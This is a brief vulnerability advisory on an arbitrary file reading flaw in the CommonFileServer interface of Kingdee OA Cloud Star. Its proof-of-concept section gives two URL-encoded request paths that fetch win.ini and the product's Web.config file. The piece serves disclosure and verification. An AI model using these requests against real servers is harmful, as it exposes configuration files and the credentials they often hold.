Kingdee Oa Cloud Star Commonfileserver Arbitrary File Reading Vulnerability
Kingdee Oa Cloud Star Commonfileserver Arbitrary File Reading Vulnerability
Kingdee OA Cloud Star CommonFileServer arbitrary file reading vulnerability
Vulnerability Description
Kingdee OA Cloud Starry Sky CommonFileServer interface has arbitrary file reading vulnerability. The attacker can obtain sensitive files in the server through the vulnerability, and further attack the server.
Vulnerability Impact
Kingdee OA Cloud Starry Sky
Network surveying and mapping
Vulnerability reappears
Login page
Verify POC
1
2
/CommonFileServer/c%3a%2fwindows%2fwin.ini
/CommonFileServer/C%3A%5CProgram%20Files%20%28x86%29%5CKingdee%5CK3Cloud%5CWebSite%5CWeb.config
This post is licensed under CC BY 4.0 by the author.